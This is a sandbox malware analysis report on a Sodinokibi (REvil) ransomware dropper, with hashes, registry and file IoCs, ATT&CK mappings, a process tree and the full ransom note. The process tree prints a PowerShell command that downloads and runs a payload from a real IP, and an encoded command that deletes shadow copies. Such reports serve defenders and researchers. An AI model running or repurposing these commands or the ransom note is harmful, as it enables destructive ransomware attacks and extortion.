sodinokibi | 205f308559944742c73835ecd74a524acfdb102c9fa1ff5635416d257c7493aa

General

Target

bsJBkqPK.bat
Size

193B
MD5

99929ffc8e13387f5a71dd140dc6450b
SHA1

1bdbc579995fbb2a567d20294cc6004c7d4b8419
SHA256

205f308559944742c73835ecd74a524acfdb102c9fa1ff5635416d257c7493aa
SHA512

6c686c8b1d6ad362012f9dc2c35947e0f856d4e177c6d1403d4b47d0f48c0a5c1c4a96a69621301b7d2daf7706872dc83d53daa2edf1842972834bfdeb672602

Score

10^/10

ransomware persistence evasion spyware trojan sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/bsJBkqPK

Extracted

Path

C:\0716t-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 0716t. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0A9DDAF5424AC687 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/0A9DDAF5424AC687 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: E0AXwBmE8hySnKwwOLJ4fCLPP8II1JYCRGmP2+pSNxcdqEAu6qD/ImaZsfX2CGy4 mX1OFq75SSm9pAsxJgWtjyzNjFXFLne8gNdzxAhl1VYUwDtnd4o95kRqBH2QqMbr nw6djxGNZJ21p0MyOyPK0fAZSJxjThBepvJQrTBCEYbVFYBJFUzSt0YdcxNjAN0Q 1HBzzNpbGt7Tmq0rKxdJCdoac63WJMNyCRTNDRbiPmiiWNylhx4nc/+mRq14u48/ 6Z4kDHpC6Um25II/pe9N/k0abu/BwHj+zH5kD7WRNslC9v9rFKuYYzEn7OjNEi3I k9sB3fXzF5NnJBRAD+zmeUGDJCsl7qR2clNXDFOCFYS5GV7W8YVk0T00quDhdPZe 1fnC2eNCmDf8zwkgHSTPphAcfCSmH9u7o0QgoEgi6NClVhUTEzBEiwlCenNzqbTa ECkqB58TcJ2NRQf6Jf4OoJb7uiPGZeSH8vqLGKYDaACywXCEpzLQf6Lsv7dXbRqw meqGQk3L/qcSOS4GGVsdOJfhiBLWAep4PSvJiux2GFtYXMD9EDXo5Xxha9KgdQ6U vTgvpMxzZkmv6IU3Ba9HTYaCDQOQwRohRfd8yiGjHSex6zVZYCG5oaZht2/YeTaQ +XO6nan0+JhzfQ4UEunkGgAYMtZki9wITPrRFt3vSzeXw3Z0s6Qy08EXk+d+18NF GvEt+BcCWtiFL7BskKIxC9DNm69rIHBF4A7XaJnFUoS9gK6g0rpZIwuSq5tJatk7 PTjJkUtdwi8w9Na5eKW1qMoF0PqU0pRYCV2bknmgChGSj3e+NRtBoT8zEaBcFVvS eG6HrkrER4Oo7WvXiRLHHEXtOV9dAL2N+akLOEjVI2B0t1xkrskmKaF8nMlB7c5s /OdCt2x/+dDwvFU0BSp/LiwYEOY8xtfF7OBd65hqI+m/tOaTbf9UniMhj36P72lJ u1iX+a5qtzgt8WUIXpJW36K85dlhaOrgS0XMOMXgN5p8ttgJx0hq+Zh539Nk8gFk srq7gXqC+eleXSne6a3l5wDEJU13bisRoTuxgPDBcGYqS4AFggD4ybw3fMMKw3nU PJFKBGx9Q9fovIjf6rkLlwBcNBpxSpHTgWzFBe7K4LUJKwDHomH1cLDjbzpZEr61 j0wQTAldZt1qppRY1DSGJ/7y4t+pYV30GJCFDahV2P1TxnEY7UMxhUteZmjLr7Y8 B/Vs2ZwXbqQzO9qEqcZxr6U78pBLie/Mb2z77gRDoXOEXJ7rShRfTneIrhxkE4TX 17YjHgzlEYeUTlZs2Iddw5EteMSEjW/YScCThUdr Extension name: 0716t ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0A9DDAF5424AC687

http://decryptor.cc/0A9DDAF5424AC687

Signatures

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9pth4fxs66.bmp"	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd155090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877619000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1932 powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

pid	process
1932	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1908 wrote to memory of 1932	1908	cmd.exe	powershell.exe
PID 1932 wrote to memory of 2036	1932	powershell.exe	powershell.exe
PID 1932 wrote to memory of 2036	1932	powershell.exe	powershell.exe
PID 1932 wrote to memory of 2036	1932	powershell.exe	powershell.exe
PID 1932 wrote to memory of 2036	1932	powershell.exe	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeBackupPrivilege	1436	vssvc.exe
Token: SeRestorePrivilege	1436	vssvc.exe
Token: SeAuditPrivilege	1436	vssvc.exe
Token: SeTakeOwnershipPrivilege	1932	powershell.exe

Blacklisted process makes network request 100 IoCs

Processes:

powershell.exe

flow	pid	process
3	1932	powershell.exe
5	1932	powershell.exe
6	1932	powershell.exe
8	1932	powershell.exe
10	1932	powershell.exe
11	1932	powershell.exe
13	1932	powershell.exe
14	1932	powershell.exe
16	1932	powershell.exe
17	1932	powershell.exe
19	1932	powershell.exe
20	1932	powershell.exe
22	1932	powershell.exe
24	1932	powershell.exe
26	1932	powershell.exe
27	1932	powershell.exe
28	1932	powershell.exe
31	1932	powershell.exe
33	1932	powershell.exe
34	1932	powershell.exe
36	1932	powershell.exe
38	1932	powershell.exe
39	1932	powershell.exe
41	1932	powershell.exe
43	1932	powershell.exe
45	1932	powershell.exe
47	1932	powershell.exe
49	1932	powershell.exe
51	1932	powershell.exe
53	1932	powershell.exe
54	1932	powershell.exe
56	1932	powershell.exe
58	1932	powershell.exe
60	1932	powershell.exe
62	1932	powershell.exe
63	1932	powershell.exe
65	1932	powershell.exe
67	1932	powershell.exe
69	1932	powershell.exe
71	1932	powershell.exe
72	1932	powershell.exe
74	1932	powershell.exe
76	1932	powershell.exe
77	1932	powershell.exe
79	1932	powershell.exe
80	1932	powershell.exe
82	1932	powershell.exe
83	1932	powershell.exe
85	1932	powershell.exe
86	1932	powershell.exe
89	1932	powershell.exe
93	1932	powershell.exe
95	1932	powershell.exe
97	1932	powershell.exe
99	1932	powershell.exe
101	1932	powershell.exe
102	1932	powershell.exe
104	1932	powershell.exe
106	1932	powershell.exe
107	1932	powershell.exe
109	1932	powershell.exe
111	1932	powershell.exe
114	1932	powershell.exe
115	1932	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1932 powershell.exe
1932 powershell.exe
1932 powershell.exe
2036 powershell.exe
2036 powershell.exe

pid	process
1932	powershell.exe
1932	powershell.exe
1932	powershell.exe
2036	powershell.exe
2036	powershell.exe

Discovering connected drives 3 TTPs 7 IoCs

ransomware

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

powershell.exepowershell.execmd.exe

description	ioc	process
File opened (read-only)	\??\F:	powershell.exe
File opened (read-only)	\??\C:	powershell.exe
File opened (read-only)	\??\A:	powershell.exe
File opened (read-only)	\??\B:	powershell.exe
File opened (read-only)	\??\E:	powershell.exe
File opened (read-only)	\??\C:	cmd.exe
File opened (read-only)	\??\C:	powershell.exe

Drops file in Program Files directory 26 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\microsoft sql server compact edition\v3.5\sqlceqp35.dll	powershell.exe
File opened for modification	\??\c:\program files\EditRepair.mpv2	powershell.exe
File opened for modification	\??\c:\program files\RestartSave.xltm	powershell.exe
File opened for modification	\??\c:\program files\SkipApprove.xhtml	powershell.exe
File opened for modification	\??\c:\program files\UnpublishSync.aifc	powershell.exe
File opened for modification	\??\c:\program files\MoveWait.tif	powershell.exe
File opened for modification	\??\c:\program files\RestartUninstall.midi	powershell.exe
File opened for modification	\??\c:\program files\SplitRestart.bmp	powershell.exe
File opened for modification	\??\c:\program files\SuspendGrant.m4a	powershell.exe
File created	\??\c:\program files (x86)\0716t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\DisableCopy.M2T	powershell.exe
File opened for modification	\??\c:\program files\ExpandProtect.ods	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\0716t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UnpublishConvertTo.rmi	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\0716t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\microsoft sql server compact edition\v3.5\sqlceme35.dll	powershell.exe
File opened for modification	\??\c:\program files\microsoft sql server compact edition\v3.5\sqlceoledb35.dll	powershell.exe
File opened for modification	\??\c:\program files\GrantOpen.inf	powershell.exe
File opened for modification	\??\c:\program files\LockBackup.au	powershell.exe
File opened for modification	\??\c:\program files\microsoft sql server compact edition\v3.5\sqlcecompact35.dll	powershell.exe
File opened for modification	\??\c:\program files\microsoft sql server compact edition\v3.5\sqlceer35EN.dll	powershell.exe
File opened for modification	\??\c:\program files\microsoft sql server compact edition\v3.5\sqlcese35.dll	powershell.exe
File created	\??\c:\program files\0716t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConvertToFormat.ini	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\0716t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\microsoft sql server compact edition\v3.5\sqlceca35.dll	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\bsJBkqPK.bat"
1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bsJBkqPK');Invoke-IYPAVFFMNH;Start-Sleep -s 10000"
2⤵
- Sets desktop wallpaper using registry
- Modifies system certificate store
- Drops file in System32 directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
- Drops file in Program Files directory
PID:1932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
PID:2036

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1436

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/1932-12-0x0000000008FF0000-0x0000000009375000-memory.dmp

Filesize
3.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads